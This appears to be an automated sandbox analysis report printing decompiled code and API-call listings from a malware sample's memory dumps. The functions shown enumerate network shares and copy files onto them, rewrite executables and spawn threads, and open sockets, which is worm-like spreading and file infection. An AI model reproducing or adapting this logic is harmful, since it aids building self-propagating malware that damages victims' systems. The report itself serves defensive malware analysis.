                                						_t13 = _t119 + 0x40143e; // 0x228db9e
                                						_t14 = _t119 + 0x401422; // 0x76670000
                                						_push( *_t14);
                                						 *((intOrPtr*)(_t119 + 0x40144d)) = E0228D9C0(E0228D9E6());
                                						_t16 = _t119 + 0x40142b; // 0x228db8b
                                						_t17 = _t119 + 0x401422; // 0x76670000
                                						_push( *_t17);
                                						 *((intOrPtr*)(_t119 + 0x40143a)) = E0228D9C0(E0228D9E6());
                                						goto L11;
                                					}
                                				} else {
                                				}
                                			}















                                0x0228d765
                                0x0228d766
                                0x0228d768
                                0x0228d76e
                                0x0228d776
                                0x0228d78b
                                0x0228d795
                                0x0228d826
                                0x0228d826
                                0x0228d83c
                                0x0228d842
                                0x0228d84e
                                0x0228d858
                                0x0228d85e
                                0x0228d872
                                0x0228d878
                                0x0228d88c
                                0x0228d894
                                0x0228d8a2
                                0x0228d8aa
                                0x0228d8ac
                                0x0228d8b9
                                0x0228d8c0
                                0x0228d8c0
                                0x0228d8c6
                                0x0228d8cc
                                0x0228d8ce
                                0x0228d8ce
                                0x0228d8cc
                                0x0228d8b9
                                0x0228d8aa
                                0x0228d8d0
                                0x0228d8d9
                                0x0228d8f0
                                0x00000000
                                0x0228d8f6
                                0x0228d901
                                0x0228d901
                                0x0228d90b
                                0x0228d918
                                0x00000000
                                0x00000000
                                0x0228d91a
                                0x0228d921
                                0x0228d9b8
                                0x0228d9b8
                                0x0228d927
                                0x0228d93d
                                0x0228d9a0
                                0x0228d9a5
                                0x0228d9ab
                                0x0228d9ad
                                0x0228d9ad
                                0x0228d942
                                0x0228d949
                                0x0228d954
                                0x0228d95a
                                0x0228d962
                                0x0228d96a
                                0x00000000
                                0x00000000
                                0x0228d972
                                0x0228d979
                                0x0228d982
                                0x0228d984
                                0x0228d995
                                0x0228d99e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0228d99e
                                0x0228d778
                                0x0228d783
                                0x0228d7a6
                                0x0228d7ae
                                0x0228d7c4
                                0x0228d7c7
                                0x0228d7b0
                                0x0228d7b8
                                0x0228d7bb
                                0x0228d7bb
                                0x0228d7cd
                                0x0228d7df
                                0x0228d7e6
                                0x0228d7ec
                                0x0228d7f3
                                0x0228d7f3
                                0x0228d803
                                0x0228d809
                                0x0228d810
                                0x0228d810
                                0x0228d820
                                0x00000000
                                0x0228d820
                                0x00000000
                                0x0228d7cf

                                APIs
                                • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 0228D831
                                • SetErrorMode.KERNEL32(00008002), ref: 0228D858
                                • CreateFileMappingA.KERNEL32(-00000001,00000000,?,00000000,00008000,hh8geqpHJTkdns6), ref: 0228D872
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,?,00000000,00015400,purity_control_7728), ref: 0228D88C
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0228D8A2
                                • GetModuleFileNameA.KERNEL32(00000000,0228EED8,000001FE), ref: 0228D935
                                • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0228D954
                                • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0228D962
                                • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0228D98F
                                • GetLastError.KERNEL32(00000000), ref: 0228D996
                                • Sleep.KERNEL32(000927C0), ref: 0228D9A5
                                • ExitProcess.KERNEL32(00000000), ref: 0228D9AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
                                • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728$Nhv
                                • API String ID: 3566498206-1682092652
                                • Opcode ID: 3c427713b1fc6c23582e8a8f9c82c32ea91a2ac7acf794b2214ddc47502650fe
                                • Instruction ID: 93db485079ff0fb280e61c7b0eb096e5789376dc0da6ed7f2a56c6b4b53009a0
                                • Opcode Fuzzy Hash: 3c427713b1fc6c23582e8a8f9c82c32ea91a2ac7acf794b2214ddc47502650fe
                                • Instruction Fuzzy Hash: 00616431651289ABEF10EFB0CD49FE93768AF04B05F440515EE09BE1E8D7B1A648CB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 56%
                                			E0221195D(struct _NETRESOURCE* _a4, CHAR* _a8) {
                                				int _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				void* _v32;
                                				int _v36;
                                				int _v40;
                                				void _v356;
                                				int _v360;
                                				void _v1383;
                                				char _v1384;
                                				int _v1388;
                                				signed int _v1392;
                                				void* _v1396;
                                				int _v1400;
                                				int _v1404;
                                				int _t94;
                                				long _t99;
                                				void* _t100;
                                				signed int _t102;
                                				signed int _t104;
                                				long _t112;
                                				long _t128;
                                				signed int _t143;
                                				void* _t144;
                                				long _t153;
                                				signed int _t158;
                                				struct _NETRESOURCE* _t159;
                                				void* _t179;
                                				intOrPtr _t180;
                                				intOrPtr _t181;
                                				void* _t183;
                                
                                				_push(0xffffffff);
                                				_push(0x2204008);
                                				_push(0x2218090);
                                				_push( *[fs:0x0]);
                                				 *[fs:0x0] = _t180;
                                				_t181 = _t180 + 0xfffffa98;
                                				_v28 = _t181;
                                				_v8 = 0;
                                				_v1384 = 0;
                                				memset( &_v1383, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v1388 = 0;
                                				_v40 = 0;
                                				_v1392 = 0;
                                				_v1396 = 0;
                                				_v1400 = 0x8000;
                                				_v36 = 0xffffffff;
                                				_v360 = 0;
                                				memset( &_v356, 0, 0x4f << 2);
                                				_t183 = _t181 + 0x18;
                                				Sleep(0x400);
                                				_v1388 = WNetOpenEnumA(2, 0, 0, _a4,  &_v1396);
                                				if(_v1388 == 0) {
                                					_t153 = _v1400 + 0x80;
                                					__eflags = _t153;
                                					_v32 = GlobalAlloc(0x40, _t153);
                                					while(1) {
                                						__eflags = _v40 - 0x103;
                                						if(_v40 == 0x103) {
                                							break;
                                						}
                                						E02204060(_v32, 0, _v1400);
                                						_t183 = _t183 + 0xc;
                                						_v40 = WNetEnumResourceA(_v1396,  &_v36, _v32,  &_v1400);
                                						__eflags = _v40;
                                						if(_v40 != 0) {
                                							_t99 = GetLastError();
                                							__eflags = _t99 - 0x103;
                                							if(_t99 == 0x103) {
                                								L26:
                                								Sleep(0x2000);
                                								continue;
                                							}
                                							break;
                                						}
                                						_v1392 = 0;
                                						while(1) {
                                							__eflags = _v1392 - _v36;
                                							if(_v1392 >= _v36) {
                                								break;
                                							}
                                							_t158 = _v1392 << 5;
                                							_t100 = _v32;
                                							__eflags =  *((intOrPtr*)(_t100 + _t158 + 4)) - 2;
                                							if( *((intOrPtr*)(_t100 + _t158 + 4)) != 2) {
                                								_t143 = _v1392 << 5;
                                								_t159 = _a4;
                                								__eflags =  *((intOrPtr*)(_t159 + _t143 + 4)) - 2;
                                								if( *((intOrPtr*)(_t159 + _t143 + 4)) != 2) {
                                									_t104 = _v1392 << 5;
                                									_t144 = _v32;
                                									__eflags =  *(_t144 + _t104 + 0x14);
                                									if( *(_t144 + _t104 + 0x14) != 0) {
                                										 *0x21e1148(_a8,  *((intOrPtr*)(_v32 + (_v1392 << 5) + 0x14)));
                                										 *0x21e106c(_a8, 0x2203d50);
                                										_t112 = E02210B9A(_a8);
                                										_t183 = _t183 + 4;
                                										__eflags = _t112;
                                										if(_t112 != 0) {
                                											 *0x22194dc = 0;
                                											__eflags = _v1384;
                                											if(_v1384 == 0) {
                                												_t150 =  &_v1384;
                                												 *0x21e1148( &_v1384, _a8);
                                												__eflags =  *((char*)(_t179 +  *0x21e114c( &_v1384) - 0x565)) - 0x5c;
                                												if(__eflags != 0) {
                                													_t150 =  &_v1384;
                                													 *0x21e106c( &_v1384, 0x2203d54);
                                												}
                                												E0220A16B(_t150, __eflags, _t179 +  *0x21e114c( &_v1384) - 0x564);
                                												 *0x21e106c( &_v1384, ".tmp");
                                												_t128 = E02210C4B( &_v1384);
                                												_t183 = _t183 + 8;
                                												__eflags = _t128;
                                												if(_t128 == 0) {
                                													_v1384 = 0;
                                												}
                                											}
                                											__eflags = _v1384;
                                											if(_v1384 != 0) {
                                												E02204060( &_v360, 0, 0x140);
                                												E02211060( *0x21e114c(0), _a8, _a8, 1,  &_v360,  &_v1384);
                                												_t183 = _t183 + 0x24;
                                											}
                                											__eflags =  *0x22194dc;
                                											if( *0x22194dc == 0) {
                                												DeleteFileA( &_v1384);
                                											}
                                										}
                                									}
                                									__eflags = _v32 + (_v1392 << 5);
                                									E0221195D(_v32 + (_v1392 << 5), _a8);
                                									_t183 = _t183 + 8;
                                									Sleep(0x1000);
                                								}
                                							}
                                							_t102 = _v1392 + 1;
                                							__eflags = _t102;
                                							_v1392 = _t102;
                                						}
                                						goto L26;
                                					}
                                					GlobalFree(_v32);
                                					WNetCloseEnum(_v1396);
                                					_v8 = 0xffffffff;
                                					_t94 = 1;
                                					goto L29;
                                				} else {
                                					_v1404 = 0;
                                					_v8 = 0xffffffff;
                                					_t94 = _v1404;
                                					L29:
                                					 *[fs:0x0] = _v20;
                                					return _t94;
                                				}
                                			}


































                                0x02211960
                                0x02211962
                                0x02211967
                                0x02211972
                                0x02211973
                                0x0221197a
                                0x02211983
                                0x02211986
                                0x0221198d
                                0x022119a1
                                0x022119a3
                                0x022119a5
                                0x022119a6
                                0x022119b0
                                0x022119b7
                                0x022119c1
                                0x022119cb
                                0x022119d5
                                0x022119dc
                                0x022119f3
                                0x022119f3
                                0x022119fa
                                0x02211a17
                                0x02211a24
                                0x02211a48
                                0x02211a48
                                0x02211a57
                                0x02211a5a
                                0x02211a5a
                                0x02211a61
                                0x00000000
                                0x00000000
                                0x02211a74
                                0x02211a79
                                0x02211a98
                                0x02211a9b
                                0x02211a9f
                                0x02211c7e
                                0x02211c84
                                0x02211c89
                                0x02211c8d
                                0x02211c92
                                0x00000000
                                0x02211c92
                                0x00000000
                                0x02211c8b
                                0x02211aa5
                                0x02211ac0
                                0x02211ac6
                                0x02211ac9
                                0x00000000
                                0x00000000
                                0x02211ad5
                                0x02211ad8
                                0x02211adb
                                0x02211ae0
                                0x02211aec
                                0x02211aef
                                0x02211af2
                                0x02211af7
                                0x02211b03
                                0x02211b06
                                0x02211b09
                                0x02211b0e
                                0x02211b29
                                0x02211b38
                                0x02211b42
                                0x02211b47
                                0x02211b4a
                                0x02211b4c
                                0x02211b52
                                0x02211b63
                                0x02211b65
                                0x02211b6f
                                0x02211b76
                                0x02211b91
                                0x02211b94
                                0x02211b9b
                                0x02211ba2
                                0x02211ba2
                                0x02211bbd
                                0x02211bd1
                                0x02211bde
                                0x02211be3
                                0x02211be6
                                0x02211be8
                                0x02211bea
                                0x02211bea
                                0x02211be8
                                0x02211bf8
                                0x02211bfa
                                0x02211c0a
                                0x02211c33
                                0x02211c38
                                0x02211c38
                                0x02211c3b
                                0x02211c42
                                0x02211c4b
                                0x02211c4b
                                0x02211c42
                                0x02211b4c
                                0x02211c61
                                0x02211c64
                                0x02211c69
                                0x02211c71
                                0x02211c71
                                0x02211af7
                                0x02211ab7
                                0x02211ab7
                                0x02211aba
                                0x02211aba
                                0x00000000
                                0x02211c7c
                                0x02211ca1
                                0x02211cae
                                0x02211cb4
                                0x02211ccd
                                0x00000000
                                0x02211a26
                                0x02211a26
                                0x02211a30
                                0x02211a37
                                0x02211cd2
                                0x02211cd5
                                0x02211ce2
                                0x02211ce2

                                APIs
                                • Sleep.KERNEL32(00000400), ref: 022119FA
                                • WNetOpenEnumA.MPR(00000002,00000000,00000000,02219078,?), ref: 02211A11
                                • GlobalAlloc.KERNEL32(00000040,00007F80), ref: 02211A51
                                • WNetEnumResourceA.MPR(?,?,?,?), ref: 02211A92
                                • lstrcpy.KERNEL32(?,00000000), ref: 02211B29
                                • lstrcat.KERNEL32(?,02203D50), ref: 02211B38
                                • lstrcpy.KERNEL32(?,?), ref: 02211B76
                                • lstrlen.KERNEL32(?), ref: 02211B83
                                • lstrcat.KERNEL32(?,02203D54), ref: 02211BA2
                                • lstrlen.KERNEL32(?), ref: 02211BAF
                                • lstrcat.KERNEL32(?,.tmp), ref: 02211BD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
                                • String ID: .tmp
                                • API String ID: 2671286937-2986845003
                                • Opcode ID: 30f2ba553a7e3b6e7a67b8a3b318252007e8899fc3b81cc8db66725570de7e11
                                • Instruction ID: 4d75b5dbd9d5a8920fa891dd6c03e6d9263641d700009fcab928dcc3a5d35e18
                                • Opcode Fuzzy Hash: 30f2ba553a7e3b6e7a67b8a3b318252007e8899fc3b81cc8db66725570de7e11
                                • Instruction Fuzzy Hash: D691C071D50618EFDB20CFA4DC88FAF7BB5AB44302F408598E60DAB284D7769A95CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 67%
                                			E02209706() {
                                				long _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				char _v20;
                                				char _v24;
                                				void _v283;
                                				char _v284;
                                				CHAR* _v288;
                                				_Unknown_base(*)()* _v292;
                                				void _v551;
                                				char _v552;
                                				void* _v556;
                                				struct HINSTANCE__* _v560;
                                				long _v564;
                                				void* _v568;
                                				signed int _v572;
                                				void* _v576;
                                				char _v580;
                                				intOrPtr* _v584;
                                				int _v588;
                                				int _t130;
                                				CHAR* _t132;
                                				intOrPtr _t141;
                                				intOrPtr _t146;
                                				intOrPtr _t184;
                                				intOrPtr _t186;
                                				CHAR* _t187;
                                				int _t222;
                                				int _t224;
                                				void* _t229;
                                
                                				_v552 = 0;
                                				memset( &_v551, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v284 = 0;
                                				memset( &_v283, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v560 = 0;
                                				_v568 =  &_v568;
                                				_v572 = 0;
                                				GetSystemDirectoryA( &_v552, 0xf8);
                                				_push( &_v552);
                                				if( *((char*)(_t229 +  *0x21e114c() - 0x225)) != 0x5c) {
                                					 *0x21e106c( &_v552, "\\");
                                				}
                                				_v16 =  *0x221900c(0xb, _v568, "true",  &_v564);
                                				if(_v16 != 0xc0000004) {
                                					L4:
                                					return 0;
                                				} else {
                                					_v568 = GlobalAlloc(0x40, _v564);
                                					_v16 =  *0x221900c(0xb, _v568, _v564, 0);
                                					if(_v16 >= 0) {
                                						_v12 =  *((intOrPtr*)(_v568 + 0xc));
                                						_v288 = _v568 + 0x20;
                                						 *0x21e106c( &_v552, _v288);
                                						E0220A75A( &_v284);
                                						_t130 = CopyFileA( &_v552,  &_v284, 0);
                                						__eflags = _t130;
                                						if(_t130 != 0) {
                                							_v560 = LoadLibraryExA( &_v284, 0, 1);
                                						}
                                						__eflags = _v560;
                                						if(_v560 != 0) {
                                							L12:
                                							GlobalFree(_v568);
                                							_t132 =  *0x21e16c0; // 0x2202294
                                							_v292 = GetProcAddress(_v560, _t132);
                                							__eflags = _v292;
                                							if(__eflags != 0) {
                                								_v292 = _v292 - _v560;
                                								_v588 = E0220959E(__eflags, _v560, _v292);
                                								__eflags = _v588;
                                								if(_v588 != 0) {
                                									E02209507( &_v580, _v560,  &_v580,  &_v24,  &_v20);
                                									_v572 = 0;
                                									_v584 = _v560 + _v588;
                                									while(1) {
                                										_t184 = _v24;
                                										_t141 = _v24;
                                										__eflags =  *_v584 -  *((intOrPtr*)(_t184 + 0x1c)) -  *((intOrPtr*)(_t141 + 0x38));
                                										if( *_v584 -  *((intOrPtr*)(_t184 + 0x1c)) >=  *((intOrPtr*)(_t141 + 0x38))) {
                                											break;
                                										}
                                										_v584 = _v584 + 4;
                                										_t224 = _v572 + 1;
                                										__eflags = _t224;
                                										_v572 = _t224;
                                									}
                                									_v556 = GlobalAlloc(0x40, 4 + _v572 * 4);
                                									_v572 = 0;
                                									_v584 = _v560 + _v588;
                                									while(1) {
                                										_t186 = _v24;
                                										_t146 = _v24;
                                										__eflags =  *_v584 -  *((intOrPtr*)(_t186 + 0x1c)) -  *((intOrPtr*)(_t146 + 0x38));
                                										if( *_v584 -  *((intOrPtr*)(_t186 + 0x1c)) >=  *((intOrPtr*)(_t146 + 0x38))) {
                                											break;
                                										}
                                										 *((intOrPtr*)(_v556 + _v572 * 4)) =  *_v584 -  *((intOrPtr*)(_v24 + 0x1c)) + _v12;
                                										_v584 = _v584 + 4;
                                										_t222 = _v572 + 1;
                                										__eflags = _t222;
                                										_v572 = _t222;
                                									}
                                									 *_v556 = 0x29a;
                                									_t187 =  *0x21e17f8; // 0x22026e0
                                									_v576 = CreateFileA(_t187, 0x40000000, 0, 0, 3, 0, 0);
                                									__eflags = _v576 - 0xffffffff;
                                									if(_v576 != 0xffffffff) {
                                										WriteFile(_v576, _v556, _v572 << 2,  &_v8, 0);
                                										CloseHandle(_v576);
                                										GlobalFree(_v556);
                                										FreeLibrary(_v560);
                                										__eflags = _v284;
                                										if(_v284 != 0) {
                                											DeleteFileA( &_v284);
                                										}
                                										return 1;
                                									}
                                									return 0;
                                								}
                                								return 0;
                                							}
                                							return 0;
                                						} else {
                                							_v560 = LoadLibraryExA(_v288, 0, 1);
                                							__eflags = _v560;
                                							if(_v560 != 0) {
                                								goto L12;
                                							}
                                							return 0;
                                						}
                                					} else {
                                					}
                                					goto L4;
                                				}
                                			}

































                                0x02209710
                                0x02209724
                                0x02209726
                                0x02209728
                                0x02209729
                                0x0220973d
                                0x0220973f
                                0x02209741
                                0x02209742
                                0x02209752
                                0x02209758
                                0x0220976e
                                0x0220977a
                                0x0220978c
                                0x0220979a
                                0x0220979a
                                0x022097b8
                                0x022097c2
                                0x022097f6
                                0x00000000
                                0x022097c4
                                0x022097d3
                                0x022097f1
                                0x02209801
                                0x0220980e
                                0x02209827
                                0x0220983b
                                0x02209848
                                0x02209860
                                0x02209866
                                0x02209868
                                0x0220987b
                                0x0220987b
                                0x02209881
                                0x02209888
                                0x022098b1
                                0x022098b8
                                0x022098be
                                0x022098d1
                                0x022098d7
                                0x022098de
                                0x022098f3
                                0x0220990f
                                0x02209915
                                0x0220991c
                                0x0220993b
                                0x02209943
                                0x02209959
                                0x0220997f
                                0x02209985
                                0x0220998d
                                0x02209990
                                0x02209993
                                0x00000000
                                0x00000000
                                0x0220996a
                                0x02209976
                                0x02209976
                                0x02209979
                                0x02209979
                                0x022099ad
                                0x022099b3
                                0x022099c9
                                0x022099ef
                                0x022099f5
                                0x022099fd
                                0x02209a00
                                0x02209a03
                                0x00000000
                                0x00000000
                                0x02209a22
                                0x022099da
                                0x022099e6
                                0x022099e6
                                0x022099e9
                                0x022099e9
                                0x02209a2d
                                0x02209a42
                                0x02209a4f
                                0x02209a55
                                0x02209a5c
                                0x02209a80
                                0x02209a8d
                                0x02209a9a
                                0x02209aa7
                                0x02209ab4
                                0x02209ab6
                                0x02209abf
                                0x02209abf
                                0x00000000
                                0x02209ac5
                                0x00000000
                                0x02209a5e
                                0x00000000
                                0x0220991e
                                0x00000000
                                0x0220988a
                                0x0220989b
                                0x022098a1
                                0x022098a8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022098aa
                                0x00000000
                                0x02209803
                                0x00000000
                                0x02209801

                                APIs
                                • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 0220976E
                                • lstrlen.KERNEL32(00000000), ref: 0220977B
                                • lstrcat.KERNEL32(00000000,02203C94), ref: 0220979A
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 022097CD
                                • lstrcat.KERNEL32(00000000,?), ref: 0220983B
                                  • Part of subcall function 0220A75A: GetTempPathA.KERNEL32(00000080,02213015,?), ref: 0220A78C
                                  • Part of subcall function 0220A75A: lstrlen.KERNEL32(02213015), ref: 0220A796
                                  • Part of subcall function 0220A75A: lstrcat.KERNEL32(02213015,02203CC0), ref: 0220A7B2
                                  • Part of subcall function 0220A75A: lstrcpy.KERNEL32(00000000,00000000), ref: 0220A7CF
                                  • Part of subcall function 0220A75A: lstrlen.KERNEL32(02213015,02202880,00000000), ref: 0220A7FD
                                  • Part of subcall function 0220A75A: wsprintfA.USER32 ref: 0220A809
                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 02209860
                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 02209875
                                • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 02209895
                                • GlobalFree.KERNEL32(?), ref: 022098B8
                                • GetProcAddress.KERNEL32(00000000,02202294), ref: 022098CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                • String ID:
                                • API String ID: 1023114332-0
                                • Opcode ID: 7c020632141a7c70bb6c81e4eab0002b6c80cd6f3a682a378a485a26b723ad60
                                • Instruction ID: 0d29d76a7fd372fda5d37a88b08c43b40bd03aa591077cc5ac23aeedeebafc78
                                • Opcode Fuzzy Hash: 7c020632141a7c70bb6c81e4eab0002b6c80cd6f3a682a378a485a26b723ad60
                                • Instruction Fuzzy Hash: 13B10971910219EFDB24DBA4DC88BEEB7B5AB48700F1085D8E50AAB285D774AEC0CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 83%
                                			E022114D9(void _a4, long _a8) {
                                				void* _v8;
                                				char _v268;
                                				void* _v272;
                                				long _v276;
                                				struct _SECURITY_ATTRIBUTES* _v280;
                                				long _v284;
                                				struct _SECURITY_ATTRIBUTES* _t62;
                                				void* _t69;
                                				void* _t89;
                                				intOrPtr _t90;
                                				intOrPtr _t119;
                                				void* _t124;
                                				void* _t125;
                                				void* _t126;
                                
                                				_v8 = 0;
                                				_v280 = 0;
                                				_v284 = 0;
                                				_v276 = 0;
                                				_v272 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0, 0);
                                				if(_v272 != 0xffffffff) {
                                					_v8 = GlobalAlloc(0x40, _a8 + 0x1000);
                                					ReadFile(_v272, _v8, _a8,  &_v284, 0);
                                					_t62 = E02204527(_v8, _a8, 0x21e21a4,  *0x21e114c(0x21e21a4));
                                					_t125 = _t124 + 0x10;
                                					_v280 = _t62;
                                					if(_v280 == 0) {
                                						L14:
                                						if(_v8 != 0) {
                                							GlobalFree(_v8);
                                						}
                                						return _v284;
                                					}
                                					_t69 = E022047BB(_v8, _v280 - _v8, _v280 +  *0x21e114c(0x21e21a4));
                                					_t126 = _t125 + 0xc;
                                					if(_t69 == 0) {
                                						goto L14;
                                					}
                                					_v276 = 0;
                                					while(_v276 < _v280 - _v8) {
                                						_t119 =  *0x21e17bc; // 0x2202654
                                						_t89 =  *0x21e114c( &_v268);
                                						_t90 =  *0x21e17bc; // 0x2202654
                                						E022042EC(_t90, _t89, _t119);
                                						E022043C5(_v8 + _v276, 0x400,  &_v268);
                                						_t126 = _t126 + 0x18;
                                						_v276 = _v276 + 0x400;
                                					}
                                					SetFilePointer(_v272, 0, 0, 0);
                                					WriteFile(_v272, _v8, _v280 - _v8,  &_v284, 0);
                                					SetFilePointer(_v272, _v280 - _v8, 0, 0);
                                					SetEndOfFile(_v272);
                                					CloseHandle(_v272);
                                					if( *_v8 != 0x4d ||  *((char*)(_v8 + 1)) != 0x5a) {
                                						if(_v8 != 0) {
                                							GlobalFree(_v8);
                                						}
                                						DeleteFileA(_a4);
                                						return 1;
                                					} else {
                                						E02204631(_a4);
                                						Sleep(0x400);
                                						E022041C6( &_v276, CreateThread(0, 0, E0220A1F2,  &_a4, 0,  &_v276), 0, 0);
                                						Sleep(0x400);
                                						goto L14;
                                					}
                                				}
                                				return 0;
                                			}

















                                0x022114e2
                                0x022114e9
                                0x022114f3
                                0x022114fd
                                0x02211520
                                0x0221152d
                                0x02211548
                                0x02211563
                                0x02211582
                                0x02211587
                                0x0221158a
                                0x02211597
                                0x02211730
                                0x02211734
                                0x0221173a
                                0x0221173a
                                0x00000000
                                0x02211740
                                0x022115bf
                                0x022115c4
                                0x022115c9
                                0x00000000
                                0x00000000
                                0x022115cf
                                0x022115ed
                                0x02211605
                                0x0221160c
                                0x02211613
                                0x02211619
                                0x02211637
                                0x0221163c
                                0x022115e7
                                0x022115e7
                                0x0221164e
                                0x02211672
                                0x0221168d
                                0x0221169a
                                0x022116a7
                                0x022116b6
                                0x022116c8
                                0x022116ce
                                0x022116ce
                                0x022116d8
                                0x00000000
                                0x022116e5
                                0x022116e9
                                0x022116f6
                                0x0221171d
                                0x0221172a
                                0x00000000
                                0x0221172a
                                0x022116b6
                                0x00000000

                                APIs
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0221151A
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 02211542
                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02211563
                                • lstrlen.KERNEL32(021E21A4), ref: 0221156E
                                • lstrlen.KERNEL32(021E21A4), ref: 022115A2
                                • lstrlen.KERNEL32(02202654,?), ref: 0221160C
                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0221164E
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02211672
                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0221168D
                                • SetEndOfFile.KERNEL32(?), ref: 0221169A
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
                                • String ID:
                                • API String ID: 3635920088-0
                                • Opcode ID: edf2df7896293833515bff99f7b1760717c2a31cdd1e0e499b3811b20ebe1e1c
                                • Instruction ID: 6b6f20e508e3c46a372b9ee1e8f8da6f55d871a0720ed8f4a2c7f4ce981192ac
                                • Opcode Fuzzy Hash: edf2df7896293833515bff99f7b1760717c2a31cdd1e0e499b3811b20ebe1e1c
                                • Instruction Fuzzy Hash: 00612C75E50208FBDB14DBE4DD49FDE77B9AB48700F108584E709AA284D7B49E90CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • socket.WS2_32(00000002,00000001,00000006), ref: 02207C83
                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 02207CD8
                                • connect.WS2_32(000000FF,00000002,00000010), ref: 02207CEB
                                • WSAGetLastError.WS2_32 ref: 02207D05
                                • Sleep.KERNEL32(00000032), ref: 02207D1F
                                • select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 02207E79
                                • ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 02207EE6
                                • closesocket.WS2_32(000000FF), ref: 02207EFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
